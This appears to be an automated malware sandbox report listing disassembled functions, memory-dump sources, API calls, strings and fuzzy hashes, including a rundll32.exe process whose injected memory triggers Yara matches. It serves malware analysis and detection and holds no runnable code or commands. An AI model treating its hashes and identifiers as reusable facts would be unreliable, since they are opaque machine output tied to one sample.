                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                      • Instruction ID: b66911016b5e55ddbcffd45bba9a6388ebaab6e140062be98a0be6b8b9fab70d
                                      • Opcode Fuzzy Hash: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                      • Instruction Fuzzy Hash: B2612971900655AACB24CF5DC8808FFBBF5EF94300B94C9AEE5E647680D734EA80CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B73B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                      • Instruction ID: 1c076bb921a246187493cbdea9012c027dfcc01129800d62497278c8fc7239a9
                                      • Opcode Fuzzy Hash: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                      • Instruction Fuzzy Hash: BE618072904748AFCB219F69C9404BA7BF5EF54710B14C5AAF8BE97141E234EB40EB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B07EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B23F12
                                      Strings
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B23F4A
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B23EC4
                                      • Execute=1, xrefs: 00B23F5E
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B23F75
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B2E2FB
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B2E345
                                      • ExecuteOptions, xrefs: 00B23F04
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: BaseDataModuleQuery
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 3901378454-484625025
                                      • Opcode ID: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                      • Instruction ID: 8032d25ab2e9afb4dd3a6f5a2246922e2e07de85c49d6a076c7e320ade8940eb
                                      • Opcode Fuzzy Hash: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                      • Instruction Fuzzy Hash: D3418871A8025D7BDB20EA94ECD6FDAB3FCBB54700F0005E9B509E61C1EA70AB459B61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B10B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __fassign
                                      • String ID: .$:$:
                                      • API String ID: 3965848254-2308638275
                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction ID: d558425e207cb058b705e456671465b44d828559f74293a459486de45e4e498c
                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction Fuzzy Hash: D0A1AE7192430ADFCF24EF64C8856EEBBF4EF15304F6485AAD412A7281D6B09AC1CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B10554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                      Download Yara Rule
                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B32206
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-4236105082
                                      • Opcode ID: 9735d8c686ec614f136978f27a8035ce7e471330f9094b9de1feee442e59d8fa
                                      • Instruction ID: 06f68683407c3fea3178bc5adb9bef4062b4dd3577524fd1480e587aae6dbf2a
                                      • Opcode Fuzzy Hash: 9735d8c686ec614f136978f27a8035ce7e471330f9094b9de1feee442e59d8fa
                                      • Instruction Fuzzy Hash: B1513A35B002116FEB149B19DCC1FA733EAEB94710F3142A9FD09EB285D971EC818790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B114C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___swprintf_l.LIBCMT ref: 00B3EA22
                                        • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B1146B
                                        • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B11490
                                      • ___swprintf_l.LIBCMT ref: 00B1156D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      • Opcode ID: e6a10c89bcef708063cab55885d692ab709524340c349ed85d4cb123de67c007
                                      • Instruction ID: d8153b9e52968f04375a7132faa65177d4b9d5ec284256ef0d0f1717ea4cce28
                                      • Opcode Fuzzy Hash: e6a10c89bcef708063cab55885d692ab709524340c349ed85d4cb123de67c007
                                      • Instruction Fuzzy Hash: 7F218672900219ABCB20DE58CC41AEB77EDFB60700F944996F956D3240DB70EE988BE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B73DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      • Opcode ID: 7c8394b591ee7eee0a50925645284f964ddec9c15966f8367d39e989dafa7ecb
                                      • Instruction ID: e527911b14ef6726566a4d8bb582b904d9ebad6e004d10e2e44f343ceb5e1468
                                      • Opcode Fuzzy Hash: 7c8394b591ee7eee0a50925645284f964ddec9c15966f8367d39e989dafa7ecb
                                      • Instruction Fuzzy Hash: 6021D07290021AABCB20AE69CC459EF77ECEF14B14F0445A2FC29A7241EB709F44C7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AF53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B322F4
                                      Strings
                                      • RTL: Re-Waiting, xrefs: 00B32328
                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B322FC
                                      • RTL: Resource at %p, xrefs: 00B3230B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-871070163
                                      • Opcode ID: 5f44589a160703a4584d44abb8150402cb745bfdfba22e2dcdfc51fe397977ab
                                      • Instruction ID: 13963177ce06be076f344a1f99388d4ff42b9774f9c065ec30550bb19a73db37
                                      • Opcode Fuzzy Hash: 5f44589a160703a4584d44abb8150402cb745bfdfba22e2dcdfc51fe397977ab
                                      • Instruction Fuzzy Hash: 81513571A00705ABDB109B78DC91FA773E8EF58760F214269FE09DF281EA70EC4187A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AFEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                      Download Yara Rule
                                      Strings
                                      • RTL: Re-Waiting, xrefs: 00B324FA
                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B324BD
                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B3248D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                      • API String ID: 0-3177188983
                                      • Opcode ID: d0495c18dee6c38a9f6f52962c24d2661dba460f1fcae19251a84322d3f315d9
                                      • Instruction ID: 955655a095251a56b441ddc2aade6df434fef72516b5ce50317beacf4134dfdb
                                      • Opcode Fuzzy Hash: d0495c18dee6c38a9f6f52962c24d2661dba460f1fcae19251a84322d3f315d9
                                      • Instruction Fuzzy Hash: 2241F470A00204BFC720DBA8DD85FAA77F9EF44720F208686F6599B3D1D774E94187A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B0FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __fassign
                                      • String ID:
                                      • API String ID: 3965848254-0
                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction ID: f05e827a27f08dcb7e5d98ba8b9a0350ad7ba48f66c402897f6cf269f8ce8bd6
                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction Fuzzy Hash: 4A915C31E0020AEBDF24DF98C8456BEBBF4EF55304F3485BAD411A65E2E7309A81CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B85CFA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __aulldvrm
                                      • String ID: $$0
                                      • API String ID: 1302938615-389342756
                                      • Opcode ID: d348e7938c89a92d02caffcf2b2658e20601bb77adc28d9868206d3b4f603840
                                      • Instruction ID: b242c793adf8ed19b3989667f01f18dde5f6268e1c578daed2e4dcd92bdbc1ba
                                      • Opcode Fuzzy Hash: d348e7938c89a92d02caffcf2b2658e20601bb77adc28d9868206d3b4f603840
                                      • Instruction Fuzzy Hash: 42917B70D04A8AEEDF35EFA988456EDBBF1EF01311F1446EAD8A1A72A1C7744A41CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AFB7D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ACFAE8: LdrInitializeThunk.NTDLL ref: 00ACFAF3
                                      • __aullrem.LIBCMT ref: 00AFB816
                                      • __aullrem.LIBCMT ref: 00AFB83D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __aullrem$InitializeThunk
                                      • String ID: s
                                      • API String ID: 241165383-3872074652
                                      • Opcode ID: c70daa67a1796d39401e565bf518849a03f102c15e9f9983624bb5e54615d1a0
                                      • Instruction ID: 43d7288abb85c32089ceb2366933947195d6f4235348ce0ece46df7a4d0da8b5
                                      • Opcode Fuzzy Hash: c70daa67a1796d39401e565bf518849a03f102c15e9f9983624bb5e54615d1a0
                                      • Instruction Fuzzy Hash: 3201DDB2A04208BFFB14DB98CD4AFAF76ADDB81354F250159B211EB1C1E6B49D408264
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: rundll32.exe PID: 1292 Parent PID: 1764 rundll32.exeCOMMON

                                      Executed Functions

                                      Function 000AA36B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA3BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 9be34a2570f884208d9a259c1aa46f29db6a8968e6f4017c454236a7cf7af0c8
                                      • Instruction ID: 61deeb19be6d8e7d63a3446800b5bad3fbb11a8eda3b381364603e524155ae62
                                      • Opcode Fuzzy Hash: 9be34a2570f884208d9a259c1aa46f29db6a8968e6f4017c454236a7cf7af0c8
                                      • Instruction Fuzzy Hash: B121F8B6200208AFCB08CF98DC91EEB77A9EF8C754F158658FA0D97251C630E815CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA370, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA3BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 43e19cd0155c49653bd1d96104e843653802203f9dca4f58ad9a1da8bf3cf353
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 19F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA41A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000AA465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1J
                                      • API String ID: 2738559852-816519204
                                      • Opcode ID: a4742c4edb0732e44c5bdcc6b796b24621fdde53df0d5e6bbc27c84672a31acd
                                      • Instruction ID: 84fae5f42c5abf2fd553f8eaafedd44426b715557b5015ce8a427420ee5a78ee
                                      • Opcode Fuzzy Hash: a4742c4edb0732e44c5bdcc6b796b24621fdde53df0d5e6bbc27c84672a31acd
                                      • Instruction Fuzzy Hash: CCF0E2B6204109AFCB48DF99CC80EEB77AAAF8D754F058259BE0D97251D634E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA420, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000AA465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1J
                                      • API String ID: 2738559852-816519204
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: c3aec464409ec3bd752e5099c9326ed474a035aafc3e6de88e5c15be760cbd19
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 9FF0A4B2200208AFCB18DF89DC81EEB77ADAF8C754F158258BA1D97251D630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA49C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(PM,?,?,000A4D50,00000000,FFFFFFFF), ref: 000AA4C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: PM
                                      • API String ID: 3535843008-922693620
                                      • Opcode ID: 220f032ff980f622e4b68075ed7cd0ddb57266c028064d0e16765b7e84b8e84b
                                      • Instruction ID: 333254d12274c9f4e7ccd973dbac4f1c0b672c582b08a17cfa9e043687ad0de1
                                      • Opcode Fuzzy Hash: 220f032ff980f622e4b68075ed7cd0ddb57266c028064d0e16765b7e84b8e84b
                                      • Instruction Fuzzy Hash: B4E0C2712402046FD714DBD8CC85EE77BA9EF48350F104159BA1CDB282C630EA008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA4A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(PM,?,?,000A4D50,00000000,FFFFFFFF), ref: 000AA4C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: PM
                                      • API String ID: 3535843008-922693620
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: 3bb2573c70bdcee965bca01c437ad3cced825886de723e13d1e362235da6ba1a
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: EBD01776200214ABD714EBD8CC85EE77BACEF49760F1544A9BA189B282C630FA0086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA550, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA589
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 2761866417a4f516875426d1587238866e44686dc8abaaee16284903da260d50
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: F2F015B2200208AFCB18DF89CC81EEB77ADAF88754F118158BE0897241C630F810CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
